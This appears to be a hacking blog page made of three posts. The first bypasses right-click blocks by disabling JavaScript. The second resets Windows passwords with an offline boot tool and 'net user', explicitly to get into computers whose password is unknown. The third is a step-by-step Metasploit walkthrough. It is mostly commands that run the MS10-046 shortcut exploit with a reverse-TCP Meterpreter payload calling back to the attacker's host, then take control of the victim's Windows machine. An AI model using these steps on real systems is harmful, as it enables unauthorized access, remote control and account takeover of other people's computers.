How to Bypass Right Click Block on Any Website

You might remember an experience where you tried to right-click on a web page but got a pop-up message saying that the “right-click functionality has been disabled”. Sometimes you may be trying to copy an image or view the source of a web page but when the right-click is disabled, these things would seem impossible. Bank websites and other sites that require a secure transaction such as a payment gateway are the ones to impose this kind of limited functionality on their pages. In this post, I will show you the ways by which you can easily bypass right-click block feature on any website.

In order to block the right-click activity, most websites make use of JavaScript which is one of the popular scripting languages used to enhance functionality, improve user experience and provide rich interactive features. In addition to this, it can also be used to strengthen the website’s security by adding some of the simple security features such as disabling right-click, protecting images, hiding or masking parts of a web page and so on.

How JavaScript Works?

Before you proceed to the next part which tells you how to disable the JavaScript functionality and bypass any of the restrictions imposed by it, it would be worthwhile for you to take up a minute to understand how JavaScript works.

JavaScript is a client side scripting language (in most cases), which means when loaded it runs from your own web browser. Most modern browsers including IE, Firefox, Chrome and others support JavaScript so that they can interpret the code and carry out actions that are defined in the script. In other words, it is your browser which is acting upon the instruction of JavaScript to carry out the defined actions such as blocking the right-click activity. So, disabling the JavaScript support on your browser can be a simple solution to bypass all the restrictions imposed by the website.

How to Disable the JavaScript?

Here is a step-by-step procedure to disable JavaScript on different browsers:

For Internet Explorer:

If you are using IE, just follow the steps below:

1. From the menu bar, go to Tools -> Internet Options.
2. In the “Internet Options” window, switch to Security tab and click on the button Custom level…

3. From the Security Settings, look for the option Active scripting and select the Disable radio button as shown above and click on “OK”.
4. You may even select the Prompt radio button, so that each time a page is loaded, you will have the option to either enable or disable the scripting.

For Google Chrome:

If you are using Chrome, you can disable the JavaScript by following the steps below:

1. Click on the Chrome “menu” button (on the top right corner) and select Tools.
2. From the “Settings” page, click on Show advanced settings…
3. Now under Privacy, click on the button Content settings…

4. Under the JavaScript, select the radio button which says “Do not allow any site to run JavaScript” and click on “Done”.

For Mozilla Firefox:

Steps to disable JavaScript on Firefox:

1. From the menu bar, click on Tools -> Options.
2. From the Options window, switch to Content tab, uncheck the option which says “Enable JavaScript” and click on “OK”.

How to Bypass the Right Click Block?

In order to bypass the right-click block or any other restriction imposed by JavaScript, all you need to do is just disable it in the browser and refresh the same page, so that it now reloads without JavaScript functionality. You are now free to right-click on the page, view its source or even copy any of the images that you may want to. Don’t forget to re-enable the JavaScript once again when your job is over. Otherwise lack of JavaScript support may result in unusual rendering of web pages.

How to Hack Windows Administrator Password

This post will show you how to hack Windows administrator password at times when you forget it or when you want to gain access to a computer for which you do not know the password.

Most of us have experienced a situation where in we need to gain access to a computer which is password protected or at times we may forget the administrator password without which it becomes impossible to log in to the computer. So, if you are somewhat in a same kind of situation, here is an excellent hack using which you can reset the password or make the password empty (remove the password) so that you can gain administrator access to the computer.

Hacking the Windows Admin Password:

You can do this with a small tool called  Offline NT Password & Registry Editor. This utility works offline, that means you need to shut down and boot off your computer using a floppy disk, CD or USB device (such as pen drive). The tool has the following features:

• You do not need to know the old password to set a new one.
• This tool can detect and unlock locked or disabled out user accounts.
• There is also a registry editor and other registry utilities that works under linux/unix, and can be used for other things than password editing.

How it Works?

Most Windows operating systems stores the login passwords and other encrypted passwords in a file calledsam (Security Accounts Manager). This file can be usually found in \windows\system32\config. This file is a part of Windows registry and remains inaccessible as long as the OS is active. Hence, it is necessary that you boot off your computer and access this sam file via the boot menu. This tool intelligently gains access to this file and will reset/remove the password associated with administrator or any other account.

The download link for both CD and floppy drives along with the complete instructions is given below:

Offline NT Password & Reg Editor Download

It is recommended that you download the CD version of the tool since the floppy drive is outdated or doesn’t exist in today’s computer. After the download, you’ll get a bootable image which you need to burn it onto a blank CD. Now, boot your computer from this CD and follow the screen instructions to reset the password.

Another Simple Way to Reset Non-Administrator Account Passwords:

Here is another simple way through which you can reset the password of any non-administrator accounts. The only requirement for this is that you need to have administrator privileges. Here is a step-by-step instruction to accomplish this task:

1. Open the command prompt (Start -> Run -> type cmd -> Enter)
2. Now type net user and hit Enter
3. Now the system will show you a list of user accounts on the computer. Say for example, you need to reset the password of the account by name John, then do as follows:
4. Type net user John * and hit Enter. Now, the system will ask you to enter the new password for the account. That’s it. Now you’ve successfully reset the password for John without knowing his old password.

So, in this way you can reset the password of any Windows account at times when you forget it so that you need not re-install your OS for any reason. I hope this helps.

Metasploit Tutorial

Before Hacking, you want to know about metasploit framework. If your are new one to hacking, its less possible to know about Metasploit.

Metasploit  Project is a computer security project that provides information about security vulnerabilities and aids in penetration testing and IDS signature development.

Its best-known sub-project is the open source Metasploit Framework, a tool for developing and executing exploit code against a remote target machine. Other important sub-projects include the Opcode Database, shellcode archive and related research.

The Metasploit Project is well known for its anti-forensic and evasion tools, some of which are built into the Metasploit Framework.

Requirements:

1. MetaSploit Installed ( Kali Linux Distribution)

2. Ruby Installed (Install all the package of Ruby to avoid any issues)

3. Two OS running either on same as virtual or physically different

4. Target host must not be running any AV

Machine 1:  Host   Kali  Linux  Machine

Machine 2: Target Windows 7 Machine

Msfconsole is by far the most popular part of the Metasploit Framework, and for good reason. It is one of the most flexible, feature-rich, and well-

supported tools within the Framework. Msfconsole provides a handy all-in-one interface to almost every option and setting available in the Framework; it’s like a one-stop shop for all of your exploitation dreams.

To launch msfconsole, enter msfconsole at the command line

#msfconsole

Now once you get the msf prompt type the below command  and look for the module exploit/windows/browser/ms10_046_shortcut_icon_dllloader.

An exploit is the means by which an attacker, or pen tester for that matter, takes advantage of a flaw within a system, an application, or a service. An attacker uses an exploit to attack a system in a way that results in a particular desired outcome that the developer never intended.

Here above  module exploits a vulnerability in the handling of Windows Shortcut files (.LNK) that contain an icon resource pointing to a malicious DLL.This module creates a WebDAV service that can be used to run an arbitrary payload when accessed as a UNC path.

Now once we have found the desired module we will use this exploit by typing the below command.

#msf > use  exploit/windows/browser/ms10_046_shortcut_icon_dllloader

Once loaded your msf prompt should be inclusive of the loaded exploit. given below is the image

Now once the exploit is loaded we will set the payload for the above select exploit. In our scenario will be using reverse TCP payload. Type the below command to set payload.

A payload is code that we want the system to execute and that is to be selected and delivered by the Framework. A reverse shell is a payload that

creates a connection from the target machine back to the attacker as a Windows command prompt, whereas a bind shell is a payload that

“binds” a command prompt to a listening port on the target machine, which the attacker can then connect.

#msf > set payload windows/meterpreter/reverse_tcp

Now its time to do some configuration for the exploit/payload that we have just set. type the given command

#msf > show options

You should get below default output.

Now we have to set the local host to listen. Type the given below two commands.

#msf > set SRVHOST  192.168.31.20

This will be your HOST IP address running metasploit.

#msf > set LHOST 192.168.31.20

This will be also be your HOST IP address running metasploit.

Now check if the above applied configuration is applied.

#msf > show options

Now Finally we will start to exploit. Run the command Exploit.

#msf > exploit

Once executed we should “Server Started” (Make sure that your server is not running any web service on port 80)

On any Client machine simply open Internet Explorer and try to open http://192.168.31.20

Note: it will give your a pop-up asking from permission click ALLOW and Make sure you do not have any AntiVirus running on the target PC.

You can check the number of successful connected session by running the command sessons in msf console.

Now as we can see that we have one victim connected its time to login to the system. run the command session -i 1.

#meterpeter > session -i 1

Once connected type linux command to browse inside the System and have full control on it.